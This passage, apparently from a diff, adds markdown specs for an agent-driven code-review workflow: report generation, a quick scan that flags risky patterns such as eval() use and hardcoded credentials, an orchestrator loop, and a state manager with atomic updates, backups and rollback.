total_issues: allFindings.length,
critical: allFindings.filter(f => f.severity === 'critical').length,
high: allFindings.filter(f => f.severity === 'high').length,
medium: allFindings.filter(f => f.severity === 'medium').length,
low: allFindings.filter(f => f.severity === 'low').length,
info: allFindings.filter(f => f.severity === 'info').length,
by_dimension: {
correctness: findings.correctness.length,
readability: findings.readability.length,
performance: findings.performance.length,
security: findings.security.length,
testing: findings.testing.length,
architecture: findings.architecture.length
}
};
// 4. Generate the report
const report = generateMarkdownReport(context, stats, allFindings, state.scan_summary);
// 5. Save the report
const reportPath = `${workDir}/review-report.md`;
Write(reportPath, report);
return {
stateUpdates: {
report_generated: true,
report_path: reportPath,
summary: {
...stats,
review_duration_ms: Date.now() - new Date(state.started_at).getTime()
}
}
};
}
function generateMarkdownReport(context, stats, findings, scanSummary) {
const severityEmoji = {
critical: '🔴',
high: '🟠',
medium: '🟡',
low: '🔵',
info: '⚪'
};
let report = `# Code Review Report
## Review Overview
| Item | Value |
|------|------|
| Target path | \`${context.target_path}\` |
| File count | ${context.file_count} |
| Lines of code | ${context.total_lines} |
| Primary language | ${context.language} |
| Framework | ${context.framework || 'N/A'} |
## Issue Statistics
| Severity | Count |
|----------|------|
| 🔴 Critical | ${stats.critical} |
| 🟠 High | ${stats.high} |
| 🟡 Medium | ${stats.medium} |
| 🔵 Low | ${stats.low} |
| ⚪ Info | ${stats.info} |
| **Total** | **${stats.total_issues}** |
### By Dimension
| Dimension | Issues |
|------|--------|
| Correctness | ${stats.by_dimension.correctness} |
| Security | ${stats.by_dimension.security} |
| Performance | ${stats.by_dimension.performance} |
| Readability | ${stats.by_dimension.readability} |
| Testing | ${stats.by_dimension.testing} |
| Architecture | ${stats.by_dimension.architecture} |
---
## High-Risk Areas
`;
if (scanSummary?.risk_areas?.length > 0) {
report += `| File | Reason | Priority |
|------|------|--------|
`;
for (const area of scanSummary.risk_areas.slice(0, 10)) {
report += `| \`${area.file}\` | ${area.reason} | ${area.priority} |\n`;
}
} else {
report += `No obvious high-risk areas were found.\n`;
}
report += `
---
## Issue Details
`;
// Output grouped by dimension
const dimensions = ['correctness', 'security', 'performance', 'readability', 'testing', 'architecture'];
const dimensionNames = {
correctness: 'Correctness',
security: 'Security',
performance: 'Performance',
readability: 'Readability',
testing: 'Testing',
architecture: 'Architecture'
};
for (const dim of dimensions) {
const dimFindings = findings.filter(f => f.dimension === dim);
if (dimFindings.length === 0) continue;
report += `### ${dimensionNames[dim]}
`;
for (const finding of dimFindings) {
report += `#### ${severityEmoji[finding.severity]} [${finding.id}] ${finding.category}
- **Severity**: ${finding.severity.toUpperCase()}
- **File**: \`${finding.file}\`${finding.line ? `:${finding.line}` : ''}
- **Description**: ${finding.description}
`;
if (finding.code_snippet) {
report += `
\`\`\`
${finding.code_snippet}
\`\`\`
`;
}
report += `
**Recommendation**: ${finding.recommendation}
`;
if (finding.fix_example) {
report += `
**Fix example**:
\`\`\`
${finding.fix_example}
\`\`\`
`;
}
report += `
---
`;
}
}
report += `
## Review Recommendations
### Must Fix
${stats.critical + stats.high > 0
? `Found ${stats.critical} critical and ${stats.high} high-priority issues; fix them before merging.`
: 'No issues requiring an immediate fix were found.'}
### Should Fix
${stats.medium > 0
? `Found ${stats.medium} medium-priority issues; consider addressing them in upcoming iterations.`
: 'Code quality is good; no obvious improvements needed.'}
### Nice to Have
${stats.low + stats.info > 0
? `Found ${stats.low + stats.info} low-priority suggestions; handle them per team conventions as appropriate.`
: 'No additional suggestions.'}
---
*Report generated at: ${new Date().toISOString()}*
`;
return report;
}
```
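The numeric severity ranking used when sorting findings in step 2 can be checked in isolation; the finding objects below are hypothetical:

```javascript
const severityOrder = { critical: 0, high: 1, medium: 2, low: 3, info: 4 };

// Findings arrive grouped by dimension, not by severity
const findings = [
  { id: 'READ-001', severity: 'low' },
  { id: 'SEC-001', severity: 'critical' },
  { id: 'PERF-001', severity: 'medium' }
];

// Lower rank sorts first, so critical issues lead the report
findings.sort((a, b) => severityOrder[a.severity] - severityOrder[b.severity]);

const order = findings.map(f => f.id);
console.log(order); // ['SEC-001', 'PERF-001', 'READ-001']
```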
## State Updates
```javascript
return {
stateUpdates: {
report_generated: true,
report_path: reportPath,
summary: {
total_issues: totalCount,
critical: criticalCount,
high: highCount,
medium: mediumCount,
low: lowCount,
info: infoCount,
review_duration_ms: duration
}
}
};
```
## Output
- **File**: `review-report.md`
- **Location**: `${workDir}/review-report.md`
- **Format**: Markdown
## Error Handling
| Error Type | Recovery |
|------------|----------|
| Write failure | Try a fallback location |
| Template error | Fall back to a simplified format |
## Next Actions
- On success: action-complete


@@ -0,0 +1,164 @@
# Action: Quick Scan
Quickly scan the code to identify high-risk areas.
## Purpose
Perform a fast first-pass scan:
- Identify high-complexity files
- Flag potential high-risk areas
- Surface obvious problem patterns
## Preconditions
- [ ] state.status === 'running'
- [ ] state.context !== null
## Execution
```javascript
async function execute(state, workDir) {
const context = state.context;
const riskAreas = [];
const quickIssues = [];
// 1. Scan each file
for (const file of context.files) {
try {
const content = Read(file);
const lines = content.split('\n');
// --- Complexity checks ---
const functionMatches = content.match(/function\s+\w+|=>\s*{|async\s+\w+/g) || [];
const nestingDepth = Math.max(...lines.map(l => (l.match(/^\s*/)?.[0].length || 0) / 2)); // rough depth estimate, assumes 2-space indentation
if (lines.length > 500 || functionMatches.length > 20 || nestingDepth > 8) {
riskAreas.push({
file: file,
reason: `High complexity: ${lines.length} lines, ${functionMatches.length} functions, depth ${nestingDepth}`,
priority: 'high'
});
}
// --- Quick issue detection ---
// Fast security checks
if (content.includes('eval(') || content.includes('innerHTML')) {
quickIssues.push({
type: 'security',
file: file,
message: 'Potential XSS/injection risk: eval() or innerHTML usage'
});
}
// Hardcoded credential detection
if (/(?:password|secret|api_key|token)\s*[=:]\s*['"][^'"]{8,}/i.test(content)) {
quickIssues.push({
type: 'security',
file: file,
message: 'Potential hardcoded credential detected'
});
}
// TODO/FIXME detection
const todoCount = (content.match(/TODO|FIXME|HACK|XXX/gi) || []).length;
if (todoCount > 5) {
quickIssues.push({
type: 'maintenance',
file: file,
message: `${todoCount} TODO/FIXME comments found`
});
}
// console.log detection (production code)
if (!file.includes('test') && !file.includes('spec')) {
const consoleCount = (content.match(/console\.(log|debug|info)/g) || []).length;
if (consoleCount > 3) {
quickIssues.push({
type: 'readability',
file: file,
message: `${consoleCount} console statements (should be removed in production)`
});
}
}
// Long function detection (heuristic: a brace-free function body over 2000 characters)
const longFunctions = content.match(/function[^{]+\{[^}]{2000,}\}/g) || [];
if (longFunctions.length > 0) {
quickIssues.push({
type: 'readability',
file: file,
message: `${longFunctions.length} long function(s) detected (>2000 chars)`
});
}
// Empty catch block detection
if (/catch\s*\([^)]*\)\s*\{\s*\}/.test(content)) {
quickIssues.push({
type: 'correctness',
file: file,
message: 'Empty catch block detected'
});
}
} catch (e) {
// Skip files that cannot be read
}
}
// 2. Compute the complexity score
const complexityScore = Math.min(100, Math.round(
(riskAreas.length * 10 + quickIssues.length * 5) / context.file_count * 100
));
// 3. Build the scan summary
const scanSummary = {
risk_areas: riskAreas,
complexity_score: complexityScore,
quick_issues: quickIssues
};
// 4. Save the scan results
Write(`${workDir}/scan-summary.json`, JSON.stringify(scanSummary, null, 2));
return {
stateUpdates: {
scan_completed: true,
scan_summary: scanSummary
}
};
}
```
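The complexity score in step 2 weights each risk area at 10 and each quick issue at 5, normalizes by file count, and caps the result at 100. A standalone restatement:

```javascript
// Standalone restatement of the scoring formula from step 2
function complexityScore(riskAreaCount, quickIssueCount, fileCount) {
  return Math.min(100, Math.round(
    (riskAreaCount * 10 + quickIssueCount * 5) / fileCount * 100
  ));
}

console.log(complexityScore(1, 2, 40));  // (10 + 10) / 40 * 100 = 50
console.log(complexityScore(5, 10, 10)); // raw score 1000, capped at 100
```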
## State Updates
```javascript
return {
stateUpdates: {
scan_completed: true,
scan_summary: {
risk_areas: riskAreas,
complexity_score: score,
quick_issues: quickIssues
}
}
};
```
## Output
- **File**: `scan-summary.json`
- **Location**: `${workDir}/scan-summary.json`
- **Format**: JSON
## Error Handling
| Error Type | Recovery |
|------------|----------|
| File read failure | Skip the file, continue scanning |
| Encoding issue | Skip as binary |
## Next Actions
- On success: action-deep-review (start the per-dimension review)
- Too many risk areas (>20): optionally ask the user to narrow the scope


@@ -0,0 +1,251 @@
# Orchestrator
Select and execute the next review action based on the current state.
## Role
The Code Review orchestrator is responsible for:
1. Reading the current review state
2. Selecting the next action based on that state
3. Executing the action and updating state
4. Looping until the review completes
## Dependencies
- **State Manager**: [state-manager.md](./state-manager.md) - provides atomic state operations, automatic backups, validation, and rollback
## State Management
This module uses the StateManager for all state operations, which guarantees:
- **Atomic updates** - write to a temp file, then rename, preventing corruption
- **Automatic backups** - a backup is created before every update
- **Rollback** - restore from backup on failure
- **Schema validation** - state structure integrity is enforced
### StateManager API (from state-manager.md)
```javascript
// Initialize state
StateManager.initState(workDir)
// Read the current state
StateManager.getState(workDir)
// Update state (atomic operation with automatic backup)
StateManager.updateState(workDir, updates)
// Get the next dimension to review
StateManager.getNextDimension(state)
// Mark a dimension complete
StateManager.markDimensionComplete(workDir, dimension)
// Record an error
StateManager.recordError(workDir, action, message)
// Restore from backup
StateManager.restoreState(workDir)
```
## Decision Logic
```javascript
function selectNextAction(state) {
// 1. Termination checks
if (state.status === 'completed') return null;
if (state.status === 'user_exit') return null;
if (state.error_count >= 3) return 'action-abort';
// 2. Initialization phase
if (state.status === 'pending' || !state.context) {
return 'action-collect-context';
}
// 3. Quick scan phase
if (!state.scan_completed) {
return 'action-quick-scan';
}
// 4. Deep review phase - ask StateManager for the next dimension
const nextDimension = StateManager.getNextDimension(state);
if (nextDimension) {
return 'action-deep-review'; // the dimension is passed separately
}
// 5. Report generation phase
if (!state.report_generated) {
return 'action-generate-report';
}
// 6. Done
return 'action-complete';
}
```
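A sketch of the decision flow across representative states; `StateManager.getNextDimension` is stubbed here with the dimension order defined in state-manager.md:

```javascript
// Stub matching the dimension order defined in state-manager.md
const StateManager = {
  getNextDimension(state) {
    const dims = ['correctness', 'security', 'performance', 'readability', 'testing', 'architecture'];
    return dims.find(d => !(state.reviewed_dimensions || []).includes(d)) || null;
  }
};

function selectNextAction(state) {
  if (state.status === 'completed' || state.status === 'user_exit') return null;
  if (state.error_count >= 3) return 'action-abort';
  if (state.status === 'pending' || !state.context) return 'action-collect-context';
  if (!state.scan_completed) return 'action-quick-scan';
  if (StateManager.getNextDimension(state)) return 'action-deep-review';
  if (!state.report_generated) return 'action-generate-report';
  return 'action-complete';
}

// Representative states at three stages of a review
const fresh = { status: 'pending', error_count: 0 };
const midway = {
  status: 'running', error_count: 0, context: {}, scan_completed: true,
  reviewed_dimensions: ['correctness', 'security']
};
const reviewed = { ...midway, reviewed_dimensions: ['correctness', 'security',
  'performance', 'readability', 'testing', 'architecture'], report_generated: false };

console.log(selectNextAction(fresh));    // 'action-collect-context'
console.log(selectNextAction(midway));   // 'action-deep-review'
console.log(selectNextAction(reviewed)); // 'action-generate-report'
```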
## Execution Loop
```javascript
async function runOrchestrator() {
console.log('=== Code Review Orchestrator Started ===');
let iteration = 0;
const MAX_ITERATIONS = 20; // 6 dimensions + overhead
// Initialize state (if not already initialized)
let state = StateManager.getState(workDir);
if (!state) {
state = StateManager.initState(workDir);
}
while (iteration < MAX_ITERATIONS) {
iteration++;
// 1. Read the current state (via StateManager)
state = StateManager.getState(workDir);
if (!state) {
console.error('[Orchestrator] Failed to read state, attempting recovery...');
state = StateManager.restoreState(workDir);
if (!state) {
console.error('[Orchestrator] Recovery failed, aborting.');
break;
}
}
console.log(`[Iteration ${iteration}] Status: ${state.status}`);
// 2. Select the next action
const actionId = selectNextAction(state);
if (!actionId) {
console.log('Review completed, terminating.');
break;
}
console.log(`[Iteration ${iteration}] Executing: ${actionId}`);
// 3. Update state: record the current action (via StateManager)
StateManager.updateState(workDir, { current_action: actionId });
// 4. Execute the action
try {
const actionPrompt = Read(`phases/actions/${actionId}.md`);
// Determine the dimension to review (via StateManager)
const currentDimension = StateManager.getNextDimension(state);
const result = await Task({
subagent_type: 'universal-executor',
run_in_background: false,
prompt: `
[WORK_DIR]
${workDir}
[STATE]
${JSON.stringify(state, null, 2)}
[CURRENT_DIMENSION]
${currentDimension || 'N/A'}
[ACTION]
${actionPrompt}
[SPECS]
Review Dimensions: specs/review-dimensions.md
Issue Classification: specs/issue-classification.md
[RETURN]
Return JSON with stateUpdates field containing updates to apply to state.
`
});
const actionResult = JSON.parse(result);
// 5. Update state: mark the action complete (via StateManager)
StateManager.updateState(workDir, {
current_action: null,
completed_actions: [...(state.completed_actions || []), actionId],
...actionResult.stateUpdates
});
// If this was a deep-review action, mark the dimension complete
if (actionId === 'action-deep-review' && currentDimension) {
StateManager.markDimensionComplete(workDir, currentDimension);
}
} catch (error) {
// Error handling (via StateManager.recordError)
console.error(`[Orchestrator] Action failed: ${error.message}`);
StateManager.recordError(workDir, actionId, error.message);
// Clear the current action
StateManager.updateState(workDir, { current_action: null });
// Check whether state recovery is needed
const updatedState = StateManager.getState(workDir);
if (updatedState && updatedState.error_count >= 3) {
console.error('[Orchestrator] Too many errors, attempting state recovery...');
StateManager.restoreState(workDir);
}
}
}
console.log('=== Code Review Orchestrator Finished ===');
}
```
## Action Catalog
| Action | Purpose | Preconditions |
|--------|---------|---------------|
| [action-collect-context](actions/action-collect-context.md) | Collect review target context | status === 'pending' |
| [action-quick-scan](actions/action-quick-scan.md) | Quick scan to identify risk areas | context !== null |
| [action-deep-review](actions/action-deep-review.md) | Deep review of a given dimension | scan_completed === true |
| [action-generate-report](actions/action-generate-report.md) | Generate a structured review report | all dimensions reviewed |
| [action-complete](actions/action-complete.md) | Finish the review and save results | report_generated === true |
## Termination Conditions
- `state.status === 'completed'` - review finished normally
- `state.status === 'user_exit'` - user exited voluntarily
- `state.error_count >= 3` - error limit exceeded (handled automatically by StateManager.recordError)
- `iteration >= MAX_ITERATIONS` - iteration limit exceeded
## Error Recovery
This module relies on the error recovery mechanisms provided by StateManager:
| Error Type | Recovery Strategy | StateManager Function |
|------------|-------------------|----------------------|
| State read failure | Restore from backup | `restoreState(workDir)` |
| Action execution failure | Record the error; auto-fail once the limit is reached | `recordError(workDir, action, message)` |
| State inconsistency | Validate and recover | validation built into `getState()` |
| User abort | Save current progress | `updateState(workDir, { status: 'user_exit' })` |
### Error Handling Flow
```
1. Action execution fails
   |
2. StateManager.recordError() records the error
   |
3. Check error_count
   |
   +-- < 3: continue with the next iteration
   +-- >= 3: StateManager automatically sets status='failed'
        |
        Orchestrator detects the status change
        |
        Attempts restoreState() to return to the last stable state
```
### When Backups Are Created
StateManager automatically creates backups:
- before every `updateState()` call
- on demand, via `backupState(workDir, suffix)` for named backups
### History Tracking
All state changes are recorded in `state-history.json` for debugging and auditing:
- initialization events
- field-level changes for each update
- restore operations


@@ -0,0 +1,752 @@
# State Manager
Centralized state management module for Code Review workflow. Provides atomic operations, automatic backups, validation, and rollback capabilities.
## Overview
This module solves the fragile state management problem by providing:
- **Atomic updates** - Write to temp file, then rename (prevents corruption)
- **Automatic backups** - Every update creates a backup first
- **Rollback capability** - Restore from backup on failure
- **Schema validation** - Ensure state structure integrity
- **Change history** - Track all state modifications
## File Structure
```
{workDir}/
state.json # Current state
state.backup.json # Latest backup
state-history.json # Change history log
```
## API Reference
### initState(workDir)
Initialize a new state file with default values.
```javascript
/**
* Initialize state file with default structure
* @param {string} workDir - Working directory path
* @returns {object} - Initial state object
*/
function initState(workDir) {
const now = new Date().toISOString();
const initialState = {
status: 'pending',
started_at: now,
updated_at: now,
context: null,
scan_completed: false,
scan_summary: null,
reviewed_dimensions: [],
current_dimension: null,
findings: {
correctness: [],
readability: [],
performance: [],
security: [],
testing: [],
architecture: []
},
report_generated: false,
report_path: null,
current_action: null,
completed_actions: [],
errors: [],
error_count: 0,
summary: null
};
// Write state file
const statePath = `${workDir}/state.json`;
Write(statePath, JSON.stringify(initialState, null, 2));
// Initialize history log
const historyPath = `${workDir}/state-history.json`;
const historyEntry = {
entries: [{
timestamp: now,
action: 'init',
changes: { type: 'initialize', status: 'pending' }
}]
};
Write(historyPath, JSON.stringify(historyEntry, null, 2));
console.log(`[StateManager] Initialized state at ${statePath}`);
return initialState;
}
```
### getState(workDir)
Read and parse current state from file.
```javascript
/**
* Read current state from file
* @param {string} workDir - Working directory path
* @returns {object|null} - Current state or null if not found
*/
function getState(workDir) {
const statePath = `${workDir}/state.json`;
try {
const content = Read(statePath);
const state = JSON.parse(content);
// Validate structure before returning
const validation = validateState(state);
if (!validation.valid) {
console.warn(`[StateManager] State validation warnings: ${validation.warnings.join(', ')}`);
}
return state;
} catch (error) {
console.error(`[StateManager] Failed to read state: ${error.message}`);
return null;
}
}
```
### updateState(workDir, updates)
Safely update state with atomic write and automatic backup.
```javascript
/**
* Safely update state with atomic write
* @param {string} workDir - Working directory path
* @param {object} updates - Partial state updates to apply
* @returns {object} - Updated state object
* @throws {Error} - If update fails (automatically rolls back)
*/
function updateState(workDir, updates) {
const statePath = `${workDir}/state.json`;
const tempPath = `${workDir}/state.tmp.json`;
const backupPath = `${workDir}/state.backup.json`;
const historyPath = `${workDir}/state-history.json`;
// Step 1: Read current state
let currentState;
try {
currentState = JSON.parse(Read(statePath));
} catch (error) {
throw new Error(`Cannot read current state: ${error.message}`);
}
// Step 2: Create backup before any modification
try {
Write(backupPath, JSON.stringify(currentState, null, 2));
} catch (error) {
throw new Error(`Cannot create backup: ${error.message}`);
}
// Step 3: Merge updates
const now = new Date().toISOString();
const newState = deepMerge(currentState, {
...updates,
updated_at: now
});
// Step 4: Validate new state
const validation = validateState(newState);
if (!validation.valid && validation.errors.length > 0) {
throw new Error(`Invalid state after update: ${validation.errors.join(', ')}`);
}
// Step 5: Write to temp file first (atomic preparation)
try {
Write(tempPath, JSON.stringify(newState, null, 2));
} catch (error) {
throw new Error(`Cannot write temp state: ${error.message}`);
}
// Step 6: Atomic rename (replace original with temp)
try {
// Read temp and write to original (simulating atomic rename)
const tempContent = Read(tempPath);
Write(statePath, tempContent);
// Clean up temp file
Bash(`rm -f "${tempPath}"`);
} catch (error) {
// Rollback: restore from backup
console.error(`[StateManager] Update failed, rolling back: ${error.message}`);
try {
const backup = Read(backupPath);
Write(statePath, backup);
} catch (rollbackError) {
throw new Error(`Critical: Update failed and rollback failed: ${rollbackError.message}`);
}
throw new Error(`Update failed, rolled back: ${error.message}`);
}
// Step 7: Record in history
try {
let history = { entries: [] };
try {
history = JSON.parse(Read(historyPath));
} catch (e) {
// History file may not exist, start fresh
}
history.entries.push({
timestamp: now,
action: 'update',
changes: summarizeChanges(currentState, newState, updates)
});
// Keep only last 100 entries
if (history.entries.length > 100) {
history.entries = history.entries.slice(-100);
}
Write(historyPath, JSON.stringify(history, null, 2));
} catch (error) {
// History logging failure is non-critical
console.warn(`[StateManager] Failed to log history: ${error.message}`);
}
console.log(`[StateManager] State updated successfully`);
return newState;
}
/**
* Deep merge helper - merges nested objects
*/
function deepMerge(target, source) {
const result = { ...target };
for (const key of Object.keys(source)) {
if (source[key] === null || source[key] === undefined) {
result[key] = source[key];
} else if (Array.isArray(source[key])) {
result[key] = source[key];
} else if (typeof source[key] === 'object' && typeof target[key] === 'object') {
result[key] = deepMerge(target[key], source[key]);
} else {
result[key] = source[key];
}
}
return result;
}
/**
* Summarize changes for history logging
*/
function summarizeChanges(oldState, newState, updates) {
const changes = {};
for (const key of Object.keys(updates)) {
if (key === 'updated_at') continue;
const oldVal = oldState[key];
const newVal = newState[key];
if (JSON.stringify(oldVal) !== JSON.stringify(newVal)) {
changes[key] = {
from: typeof oldVal === 'object' ? '[object]' : oldVal,
to: typeof newVal === 'object' ? '[object]' : newVal
};
}
}
return changes;
}
```
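The merge semantics matter for callers: `null` and arrays overwrite wholesale, while nested plain objects merge key by key. A quick check of `deepMerge` (copied from above) against hypothetical state fragments:

```javascript
function deepMerge(target, source) {
  const result = { ...target };
  for (const key of Object.keys(source)) {
    if (source[key] === null || source[key] === undefined) {
      result[key] = source[key];           // null/undefined overwrite
    } else if (Array.isArray(source[key])) {
      result[key] = source[key];           // arrays replace, never concatenate
    } else if (typeof source[key] === 'object' && typeof target[key] === 'object') {
      result[key] = deepMerge(target[key], source[key]); // objects merge recursively
    } else {
      result[key] = source[key];
    }
  }
  return result;
}

const base = {
  findings: { security: [{ id: 'SEC-001' }], testing: [] },
  scan_summary: { complexity_score: 40 }
};
const merged = deepMerge(base, {
  findings: { security: [{ id: 'SEC-001' }, { id: 'SEC-002' }] },
  scan_summary: null
});

console.log(merged.findings.security.length); // 2 (array replaced wholesale)
console.log(merged.findings.testing.length);  // 0 (untouched key survives the merge)
console.log(merged.scan_summary);             // null (null overwrites)
```

This is why callers updating `findings` must spread the existing dimension array themselves, as `addFinding()` below does.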
### validateState(state)
Validate state structure against schema.
```javascript
/**
* Validate state structure
* @param {object} state - State object to validate
* @returns {object} - { valid: boolean, errors: string[], warnings: string[] }
*/
function validateState(state) {
const errors = [];
const warnings = [];
// Required fields
const requiredFields = ['status', 'started_at', 'updated_at'];
for (const field of requiredFields) {
if (state[field] === undefined) {
errors.push(`Missing required field: ${field}`);
}
}
// Status validation
const validStatuses = ['pending', 'running', 'completed', 'failed', 'user_exit'];
if (state.status && !validStatuses.includes(state.status)) {
errors.push(`Invalid status: ${state.status}. Must be one of: ${validStatuses.join(', ')}`);
}
// Timestamp format validation
const timestampFields = ['started_at', 'updated_at', 'completed_at'];
for (const field of timestampFields) {
if (state[field] && !isValidISOTimestamp(state[field])) {
warnings.push(`Invalid timestamp format for ${field}`);
}
}
// Findings structure validation
if (state.findings) {
const expectedDimensions = ['correctness', 'readability', 'performance', 'security', 'testing', 'architecture'];
for (const dim of expectedDimensions) {
if (!Array.isArray(state.findings[dim])) {
warnings.push(`findings.${dim} should be an array`);
}
}
}
// Context validation (when present)
if (state.context !== null && state.context !== undefined) {
const contextFields = ['target_path', 'files', 'language', 'total_lines', 'file_count'];
for (const field of contextFields) {
if (state.context[field] === undefined) {
warnings.push(`context.${field} is missing`);
}
}
}
// Error count validation
if (typeof state.error_count !== 'number') {
warnings.push('error_count should be a number');
}
// Array fields validation
const arrayFields = ['reviewed_dimensions', 'completed_actions', 'errors'];
for (const field of arrayFields) {
if (state[field] !== undefined && !Array.isArray(state[field])) {
errors.push(`${field} must be an array`);
}
}
return {
valid: errors.length === 0,
errors,
warnings
};
}
/**
* Check if string is valid ISO timestamp
*/
function isValidISOTimestamp(str) {
if (typeof str !== 'string') return false;
const date = new Date(str);
return !isNaN(date.getTime()) && str.includes('T');
}
```
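Note that the timestamp check is deliberately loose: any string `Date` can parse that also contains a `T` passes, so it is a sanity check rather than strict ISO 8601 validation:

```javascript
function isValidISOTimestamp(str) {
  if (typeof str !== 'string') return false;
  const date = new Date(str);
  // Parseable AND contains the date/time separator
  return !isNaN(date.getTime()) && str.includes('T');
}

console.log(isValidISOTimestamp('2024-01-01T10:00:00.000Z')); // true
console.log(isValidISOTimestamp('2024-01-01'));               // false (date only, no 'T')
console.log(isValidISOTimestamp('not a date'));               // false (unparseable)
console.log(isValidISOTimestamp(1704067200000));              // false (not a string)
```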
### backupState(workDir)
Create a manual backup of current state.
```javascript
/**
* Create a manual backup of current state
* @param {string} workDir - Working directory path
* @param {string} [suffix] - Optional suffix for backup file name
* @returns {string} - Backup file path
*/
function backupState(workDir, suffix = null) {
const statePath = `${workDir}/state.json`;
const timestamp = new Date().toISOString().replace(/[:.]/g, '-');
const backupName = suffix
? `state.backup.${suffix}.json`
: `state.backup.${timestamp}.json`;
const backupPath = `${workDir}/${backupName}`;
try {
const content = Read(statePath);
Write(backupPath, content);
console.log(`[StateManager] Backup created: ${backupPath}`);
return backupPath;
} catch (error) {
throw new Error(`Failed to create backup: ${error.message}`);
}
}
```
### restoreState(workDir, backupPath)
Restore state from a backup file.
```javascript
/**
* Restore state from a backup file
* @param {string} workDir - Working directory path
* @param {string} [backupPath] - Path to backup file (default: latest backup)
* @returns {object} - Restored state object
*/
function restoreState(workDir, backupPath = null) {
const statePath = `${workDir}/state.json`;
const defaultBackup = `${workDir}/state.backup.json`;
const historyPath = `${workDir}/state-history.json`;
const sourcePath = backupPath || defaultBackup;
try {
// Read backup
const backupContent = Read(sourcePath);
const backupState = JSON.parse(backupContent);
// Validate backup state
const validation = validateState(backupState);
if (!validation.valid) {
throw new Error(`Backup state is invalid: ${validation.errors.join(', ')}`);
}
// Create backup of current state before restore (for safety)
try {
const currentContent = Read(statePath);
Write(`${workDir}/state.pre-restore.json`, currentContent);
} catch (e) {
// Current state may not exist, that's okay
}
// Update timestamp
const now = new Date().toISOString();
backupState.updated_at = now;
// Write restored state
Write(statePath, JSON.stringify(backupState, null, 2));
// Log to history
try {
let history = { entries: [] };
try {
history = JSON.parse(Read(historyPath));
} catch (e) {}
history.entries.push({
timestamp: now,
action: 'restore',
changes: { source: sourcePath }
});
Write(historyPath, JSON.stringify(history, null, 2));
} catch (e) {
console.warn(`[StateManager] Failed to log restore to history`);
}
console.log(`[StateManager] State restored from ${sourcePath}`);
return backupState;
} catch (error) {
throw new Error(`Failed to restore state: ${error.message}`);
}
}
```
## Convenience Functions
### getNextDimension(state)
Get the next dimension to review based on current state.
```javascript
/**
* Get next dimension to review
* @param {object} state - Current state
* @returns {string|null} - Next dimension or null if all reviewed
*/
function getNextDimension(state) {
const dimensions = ['correctness', 'security', 'performance', 'readability', 'testing', 'architecture'];
const reviewed = state.reviewed_dimensions || [];
for (const dim of dimensions) {
if (!reviewed.includes(dim)) {
return dim;
}
}
return null;
}
```
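Usage is straightforward; the fixed array order determines the review sequence (correctness and security first):

```javascript
// Copied from above: returns the first dimension not yet reviewed
function getNextDimension(state) {
  const dimensions = ['correctness', 'security', 'performance', 'readability', 'testing', 'architecture'];
  const reviewed = state.reviewed_dimensions || [];
  for (const dim of dimensions) {
    if (!reviewed.includes(dim)) return dim;
  }
  return null;
}

console.log(getNextDimension({ reviewed_dimensions: [] }));              // 'correctness'
console.log(getNextDimension({ reviewed_dimensions: ['correctness'] })); // 'security'
console.log(getNextDimension({ reviewed_dimensions: ['correctness',
  'security', 'performance', 'readability', 'testing', 'architecture'] })); // null
```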
### addFinding(workDir, finding)
Add a new finding to the state.
```javascript
/**
* Add a finding to the appropriate dimension
* @param {string} workDir - Working directory path
* @param {object} finding - Finding object (must include dimension field)
* @returns {object} - Updated state
*/
function addFinding(workDir, finding) {
if (!finding.dimension) {
throw new Error('Finding must have a dimension field');
}
const state = getState(workDir);
const dimension = finding.dimension;
// Generate ID if not provided
if (!finding.id) {
const prefixes = {
correctness: 'CORR',
readability: 'READ',
performance: 'PERF',
security: 'SEC',
testing: 'TEST',
architecture: 'ARCH'
};
const prefix = prefixes[dimension] || 'MISC';
const count = (state.findings[dimension]?.length || 0) + 1;
finding.id = `${prefix}-${String(count).padStart(3, '0')}`;
}
const currentFindings = state.findings[dimension] || [];
return updateState(workDir, {
findings: {
...state.findings,
[dimension]: [...currentFindings, finding]
}
});
}
```
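The ID scheme pads the per-dimension count to three digits. A standalone sketch of just the ID generation (`nextFindingId` is a hypothetical helper name, not part of the StateManager API):

```javascript
// Hypothetical helper isolating the ID generation logic from addFinding()
function nextFindingId(dimension, existingCount) {
  const prefixes = {
    correctness: 'CORR', readability: 'READ', performance: 'PERF',
    security: 'SEC', testing: 'TEST', architecture: 'ARCH'
  };
  const prefix = prefixes[dimension] || 'MISC';
  // Count is 1-based and zero-padded to three digits
  return `${prefix}-${String(existingCount + 1).padStart(3, '0')}`;
}

console.log(nextFindingId('security', 0));  // 'SEC-001'
console.log(nextFindingId('security', 11)); // 'SEC-012'
console.log(nextFindingId('style', 4));     // 'MISC-005' (unknown dimension falls back)
```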
### markDimensionComplete(workDir, dimension)
Mark a dimension as reviewed.
```javascript
/**
* Mark a dimension as reviewed
* @param {string} workDir - Working directory path
* @param {string} dimension - Dimension name
* @returns {object} - Updated state
*/
function markDimensionComplete(workDir, dimension) {
const state = getState(workDir);
const reviewed = state.reviewed_dimensions || [];
if (reviewed.includes(dimension)) {
console.warn(`[StateManager] Dimension ${dimension} already marked as reviewed`);
return state;
}
return updateState(workDir, {
reviewed_dimensions: [...reviewed, dimension],
current_dimension: null
});
}
```
### recordError(workDir, action, message)
Record an error in state.
```javascript
/**
* Record an execution error
* @param {string} workDir - Working directory path
* @param {string} action - Action that failed
* @param {string} message - Error message
* @returns {object} - Updated state
*/
function recordError(workDir, action, message) {
const state = getState(workDir);
const errors = state.errors || [];
const errorCount = (state.error_count || 0) + 1;
const newError = {
action,
message,
timestamp: new Date().toISOString()
};
const newState = updateState(workDir, {
errors: [...errors, newError],
error_count: errorCount
});
// Auto-fail if error count exceeds threshold
if (errorCount >= 3) {
return updateState(workDir, {
status: 'failed'
});
}
return newState;
}
```
## Usage Examples
### Initialize and Run Review
```javascript
// Initialize new review session
const workDir = '/path/to/review-session';
const state = initState(workDir);
// Update status to running
updateState(workDir, { status: 'running' });
// After collecting context
updateState(workDir, {
context: {
target_path: '/src/auth',
files: ['auth.ts', 'login.ts'],
language: 'typescript',
total_lines: 500,
file_count: 2
}
});
// After completing quick scan
updateState(workDir, {
scan_completed: true,
scan_summary: {
risk_areas: [{ file: 'auth.ts', reason: 'Complex logic', priority: 'high' }],
complexity_score: 75,
quick_issues: []
}
});
```
### Add Findings During Review
```javascript
// Add a security finding
addFinding(workDir, {
dimension: 'security',
severity: 'high',
category: 'injection',
file: 'auth.ts',
line: 45,
description: 'SQL injection vulnerability',
recommendation: 'Use parameterized queries'
});
// Mark dimension complete
markDimensionComplete(workDir, 'security');
```
### Error Handling with Rollback
```javascript
try {
updateState(workDir, {
status: 'running',
current_action: 'deep-review'
});
